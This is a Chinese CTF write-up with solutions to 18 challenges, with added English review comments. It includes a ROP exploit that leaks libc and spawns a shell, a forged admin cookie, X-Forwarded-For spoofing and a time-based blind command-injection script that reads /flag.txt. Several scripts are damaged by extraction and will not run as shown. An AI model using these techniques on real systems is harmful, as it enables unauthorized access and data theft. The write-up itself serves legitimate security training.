1.RE-sign
直接在rc4-crypt设置断点动调得出flag
Flag为flag{c818b9f06febf0b129a888244be37e16}
2.ez-xor
Flag为flag{HCTFqweASD173}
3. cry_rsa
flag为flag{ 2023326077889096386}
4. 被折叠的显影图纸
用010打开文件,搜索flag,可得flag is here flag{GF!1c3_E@$?_kR@Ck3d}
flag{GF!1c3_E@$?_kR@Ck3d}
5. 光隙中的寄生密钥
使用010打开文件,发现flag.txt
解压得到一张图片,使用binwalk解压缩得到flag.txt
发现有密码,使用ARCHPR.exe爆破得到密码9864
得到flag flag{Hidd3n_!@#$%^&*()}
6.gift
莱布尼茨级数(Leibniz series),它收敛于:
$\frac{\pi}{4} = 1 - \frac{1}{3} + \frac{1}{5} - \frac{1}{7} + \frac{1}{9} - \cdots$ —— pie
对pie进行凯撒密码加密,偏移量9,即yrn
Flag为flag{yrn}
7. ez_picture
使用Stegsolve.jar打开15.png LSB隐写得到密码999999999
解密文件.zip得到1.jpg
用010打开文件1.jpg
Base64解密得到flag
Flag为flag{HNCTFS3txxnkzRo6}
8. easy_misc
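# Character codes taken from the challenge; every value is a printable ASCII
# code point, and together they spell a Base64 string.
str1 = [
    77, 49, 66, 77, 83, 107, 104, 68, 78, 70, 81, 50, 90, 50, 104, 87,
    98, 87, 74, 76, 97, 88, 66, 51, 98, 50, 78, 112, 81, 88, 100, 89,
    83, 109, 82, 81, 89, 107, 112, 70, 83, 68, 73, 61,
]
# The listing as published used typographic quotes for the empty string and had
# lost the loop indentation, so it could not be parsed. Joining the characters
# once also replaces the index loop that grew the string with +=.
flag = "".join(chr(code) for code in str1)
print(flag)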
运行得到M1BMSkhDNFQ2Z2hWbWJLaXB3b2NpQXdYSmRQYkpFSDI=
Base64解密得到synt{UAPGSWeBTdU4vnxvL}
再经ROT13解码,得到flag为flag{HNCTFJrOGqH4iakiY}
9.套娃
不停地解压缩:将文件后缀.xlsx改为.zip,解压缩得到txt文件;将该文件后缀改为.zip解压缩后发现不对,将文件后缀改为.docx可见
Flag为flag{HNCTFeHbe7vFWi}
10. ez_pwn
上午打的,忘记截图了
import time
from time import time
from pwn import *
import ctypes
import concurrent.futures
# Two-stage pwntools script run against the local ./pwn binary: the first
# payload makes the program print the resolved address of write and return to
# main, the second uses the libc base computed from that address.
#
# NOTE(review): this listing was damaged when the page was extracted and is not
# valid Python as shown: the first line below fuses an import with the
# context(...) call, string quotes are typographic, the body of bug() has lost
# its indentation, and `)2+` and `b’b’(` each appear to have lost an operator.
#
# NOTE(review): the script depends on fixed code addresses and on overwriting
# the saved return address, so the target was presumably built without PIE and
# without a stack protector -- confirm with checksec. Those two build options,
# plus full RELRO, are the mitigations this class of bug is measured against.
from ctypes import CDLL, c_intcontext(arch = ‘amd64’,os = ‘linux’,log_level = ‘debug’)
#libc =ELF(‘libc-2.31.so’)
# The libc symbol offsets used below come from the analyst's own system libc.
libc = ELF(‘/lib/x86_64-linux-gnu/libc.so.6’)
p = process(‘./pwn’)
#p =remote()
elf = ELF(‘./pwn’)
# Hard-coded addresses inside the binary. The names suggest register-loading
# gadgets -- TODO confirm against the disassembly. `ret` is not used anywhere
# in the visible script.
rdi = 0x004012c3
ret = 0x040101a
rsi_ = 0x04012c1
# Debug helper: attaches gdb to the running process (only called from the
# commented-out line below).
def bug():
gdb.attach(p)
# Stage 1: 0x28 filler bytes, then a chain built from the rsi_ address, the GOT
# entry of write, the rdi address, the value 2, the PLT entry of write and
# finally the address of main so the program starts over.
payload = b’a’*(0x20+0x8)+p64(rsi_)+p64(elf.got[‘write’])2+p64(rdi)+p64(2)+p64(elf.plt[‘write’])+p64(elf.sym[‘main’])
#bug()
p.sendline(payload)
# Take the six bytes ending at the first 0x7f byte received, pad them to eight
# bytes, unpack as a 64-bit integer and subtract write's offset in libc.
libc_base = u64(p.recvuntil(‘\x7f’)[-6:].ljust(8, b’\x00’))-libc.sym[‘write’]
log.success(hex(libc_base))
# Absolute addresses of system and of the "/bin/sh" string inside libc.
system=libc_base+libc.sym[‘system’]
binsh = libc_base + next(libc.search(b’/bin/sh’))
# Stage 2: same filler length, then the rdi address, the string address and
# system.
payload = b’b’(0x20+0x8)+p64(rdi)+p64(binsh)+p64(system)
p.sendline(payload)
# Read the flag file through the resulting session, then hand over to the user.
p.sendline(b’cat flag’)
p.interactive()
得到flag
Flag为flag{a51a3bdf23919f677efccd90270da72f}
11. baby_rsa
脚本:
from Crypto.Util.number import long_to_bytes
from gmpy2 import isqrt, invert, powmod
# RSA modulus from the challenge; used below both as the number to factor and
# as the modulus of the final powmod().
N =12194420073815392880989031611545296854145241675320130314821394843436947373331080911787176737202940676809674543138807024739454432089096794532016797246441325729856528664071322968428804098069997196490382286126389331179054971927655320978298979794245379000336635795490242027519669217784433367021578247340154647762800402140321022659272383087544476178802025951768015423972182045405466448431557625201012332239774962902750073900383993300146193300485117217319794356652729502100167668439007925004769118070105324664379141623816256895933959211381114172778535296409639317535751005960540737044457986793503218555306862743329296169569
# Public exponent; inverted modulo phi below to obtain the private exponent.
e = 65537
# Ciphertext, as an integer, that the script decrypts.
c =4504811333111877209539001665516391567038109992884271089537302226304395434343112574404626060854962818378560852067621253927330725244984869198505556722509058098660083054715146670767687120587049288861063202617507262871279819211231233198070574538845161629806932541832207041112786336441975087351873537350203469642198999219863581040927505152110051313011073115724502567261524181865883874517555848163026240201856207626237859665607255740790404039098444452158216907752375078054615802613066229766343714317550472079224694798552886759103668349270682843916307652213810947814618810706997339302734827571635179684652559512873381672063
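def factor_n_adjacent_primes(N):
    """Search for a factor of N within 1000 of its integer square root.

    The search only succeeds when the two factors of N lie almost next to
    each other. An RSA modulus built from such primes offers no security,
    which is why FIPS 186-4 key generation rejects prime pairs with
    |p - q| <= 2**(nlen/2 - 100).

    Args:
        N: integer to factor.

    Returns:
        (p, N // p) for the first non-trivial divisor p found, trying
        root + i before root - i for i = 0..999, or (None, None) when no
        divisor lies in that window.
    """
    # Nothing below 4 has a non-trivial factorisation; returning early also
    # keeps isqrt() away from negative input.
    if N < 4:
        return None, None
    root = isqrt(N)
    for i in range(1000):
        for p_candidate in (root + i, root - i):
            # Only accept 1 < p < N. For small N the window reaches 1 (and N
            # itself), and N % 1 == 0 would otherwise report the trivial
            # split 1 * N as a factorisation.
            if 1 < p_candidate < N and N % p_candidate == 0:
                return p_candidate, N // p_candidate
    return None, None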
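# Factor the modulus, rebuild the private exponent and decrypt c.
# The published listing used typographic quotes and had lost the indentation of
# the else branch; both are restored here so the script parses.
p, q = factor_n_adjacent_primes(N)
if p is None or q is None:
    print("无法分解N")
else:
    print(f"已分解N: p = {p}, q = {q}")
    # Euler's totient of N = p * q.
    phi = (p - 1) * (q - 1)
    # Private exponent: inverse of e modulo phi.
    d = invert(e, phi)
    m = powmod(c, d, N)
    flag = long_to_bytes(m)
    # errors='ignore' drops any non-ASCII byte silently, so a wrong key still
    # prints something; compare against the expected flag format.
    print(f"解密后的flag: {flag.decode('ascii', errors='ignore').strip()}")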
解得flag为flag{5c9c885c361541e0b261f58b61db8cec},再将其中的9改为0
Flag为flag{5c0c885c361541e0b261f58b61db8cec}
12. 草甸方阵的密语
Flag为flag{Thatsright}
13. easy-签到题
Base64 -> Base32 -> Base16
flag为flag{4e79a218-5b3d-7c81-2f06-39148e5d67b0}
14. YWB_Web_xff
题目源码 提供了一个网页(index),检查 cip 的值是否为 2.2.2.1,如果是,就返回 flag。
cip 的值来自 HTTP 请求头 X-Forwarded-For(通常用于代理服务器传递客户端真实 IP)。该请求头由客户端发送,内容可以任意填写,所以服务端不能直接拿它做访问控制,只应信任由已知代理写入的值。
目标:伪造 X-Forwarded-For: 2.2.2.1,让服务器认为 cip=2.2.2.1,从而获取 flag。
Flag为:flag{9u60w1kemajt}
15. YWB_Web_未授权访问
2.从这道题的回显来看,响应头中的Set-Cookie字段值得重点关注,它表明当前用户身份是guest且isAdmin为false。所以修改cookie字段令isAdmin=true(将b%3A0%3B改为b%3A1%3B)。
3.利用hackbar修改:user=O%3A5%3A%22Admin%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A5%3A%22guest%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3B%7D
4.拿到flag。
16.easyweb
import requests
# Recovers a string one character at a time by asking dev() a yes/no question
# for every position 0..38 and every character code 0x1f..0x7e, appending each
# character for which dev() answers True, and printing the accumulated result.
#
#   addr   -- "host:port" of the service, passed through to dev()
#   result -- characters recovered so far (default: empty string)
#
# NOTE(review): indentation and quote characters were lost in extraction, so
# the listing does not parse as shown and the nesting level of print(result)
# cannot be determined from this page.
def get_flag(addr, result=””):
for x in range(39):
for i in range(0x1f, 0x7f):
if dev(addr, x, chr(i)):
result += chr(i)
print(result)
# Asks the service whether the character at position `pos` of /flag.txt equals
# `payload`, using response time as the answer: the `cmd` form field carries a
# shell test that runs `sleep 2` on a match, and the 1-second read timeout
# turns that delay into True (timed out) or False (answered in time).
#
# NOTE(review): this only works if the service hands the `cmd` parameter to a
# shell unchanged -- the server code is not on this page, so that is inferred.
# The fix on the server side is to never pass request parameters to a shell.
# For detection, look for bursts of requests to one endpoint whose bodies
# differ by a single character and whose response times fall into two groups.
#
# NOTE(review): the listing is damaged: the shell snippet is split across two
# lines, the quotes are typographic, and `requests` has no function named
# `dev`, so the call below cannot run as written.
def dev(addr, pos, payload):
data = {
“cmd”: “[ cut -c %d /flag.txt
= ‘%s’ ] && sleep 2” % (pos, payload)
}
# timeout=(5, 1): 5 seconds to connect, 1 second to wait for the response.
try:
requests.dev(“http://%s/“ % addr, data, timeout=(5, 1))
except requests.exceptions.ReadTimeout:
return True
return False
# Script entry point. NOTE(review): presumably `__name__ == "__main__"` with
# the double underscores stripped by the page rendering -- as shown, `name` is
# undefined. The address is hard-coded in the original listing.
if name == ‘main‘:
get_flag(“47.105.113.86:40005”)
flag为flag{d4ek6s7kzztx}
17.YWB_Web
18. ez_math
反编译得到
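def xor_decrypt(input_file, output_file, key):
    """XOR every byte of a file with a repeating key and write the result.

    XOR is its own inverse, so the same call both encodes and decodes. A
    repeating-key XOR is obfuscation only; it gives no confidentiality once
    any part of the plaintext or the key is known.

    Args:
        input_file: path of the file to read, opened in binary mode.
        output_file: path of the file to write; an existing file is replaced.
        key: non-empty key. A str is used one code point per key byte, so
            every character must be below U+0100; bytes are used as given.

    Raises:
        ValueError: if the key is empty or contains a character above U+00FF.
    """
    if not key:
        # The original failed with ZeroDivisionError on `i % len(key)`.
        raise ValueError("key must not be empty")
    if isinstance(key, (bytes, bytearray)):
        key_bytes = bytes(key)
    else:
        # latin-1 maps code points 0..255 to the same byte values, which is
        # what ord() produced in the original; anything larger is rejected.
        key_bytes = key.encode("latin-1")
    key_len = len(key_bytes)

    with open(input_file, 'rb') as f:
        encrypted_data = f.read()

    decrypted_data = bytes(
        byte ^ key_bytes[i % key_len] for i, byte in enumerate(encrypted_data)
    )

    with open(output_file, 'wb') as f:
        f.write(decrypted_data)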
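# The published listing read `if name == ‘main‘:`; the double underscores and
# the ASCII quotes are restored so the guard works.
if __name__ == "__main__":
    input_file = 'eqEnc7'
    output_file = 'eq_decoded'
    key = 'eq verySimple'
    xor_decrypt(input_file, output_file, key)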
得到
from z3 import *
import time
import re
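def optimized_solver():
    """Recover a 38-character flag from an equation file with Z3.

    Reads one equation per line from the hard-coded path, turns each into a
    Z3 expression over the bit-vector variables x_0..x_37, adds the printable
    range and the "flag{...}" framing as constraints, and prints the solution
    (or a "no solution" message).
    """
    ctx = Context()
    solver = Solver(ctx=ctx)

    # One 32-bit bit-vector per flag character, keyed by position.
    x = {i: BitVec(f'x_{i}', 32, ctx=ctx) for i in range(38)}
    # Names an equation line may refer to. This does not change between
    # lines, so it is built once instead of once per line.
    symbols = {f'x_{i}': x[i] for i in range(38)}

    def convert_eq(line):
        """Rewrite every x[N] in the line as x_N; fail if any x[ remains."""
        converted = re.sub(r'x\[(\d+)\]', r'x_\1', line)
        if 'x[' in converted:
            raise ValueError(f"格式转换失败: {line.strip()}")
        return converted

    # Load and convert the equations.
    eq_path = r"D:\题题\御网杯\enc7\eq_decoded.txt"
    equations = []
    with open(eq_path, 'r') as f:
        for line_num, line in enumerate(f, 1):
            text = line.strip()
            if not text:
                # A blank line would make eval() raise SyntaxError and abort.
                continue
            try:
                converted_line = convert_eq(text)
                # SECURITY: eval() runs whatever the file contains. The file
                # is decoded from a challenge download, i.e. untrusted input,
                # and an empty globals dict does not help because Python adds
                # __builtins__ to it. Read the decoded file before running
                # this, or run it in a throwaway VM or container.
                eq = eval(converted_line, {}, symbols)
                equations.append(eq)
            except Exception:
                print(f"错误位于第 {line_num} 行: {line.strip()}")
                raise

    # Every character is printable ASCII ...
    constraints = [And(x[i] >= 32, x[i] <= 126) for i in range(38)]
    # ... and the string has the shape flag{...}.
    constraints += [
        x[0] == ord('f'),
        x[1] == ord('l'),
        x[2] == ord('a'),
        x[3] == ord('g'),
        x[4] == ord('{'),
        x[37] == ord('}'),
    ]
    solver.add(constraints + equations)

    # Solve and report.
    start_time = time.time()
    if solver.check() == sat:
        model = solver.model()
        flag = bytes([model.eval(x[i]).as_long() for i in range(38)])
        print(f"求解耗时: {time.time() - start_time:.2f}s")
        print("Flag:", flag.decode())
    else:
        print("无解")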
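# The published listing read `if name == “main“:`; the double underscores and
# the ASCII quotes are restored so the guard works.
if __name__ == "__main__":
    optimized_solver()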
解密得到flag为flag{815ddbd7a20d03a9cea4dd6ef8685c74}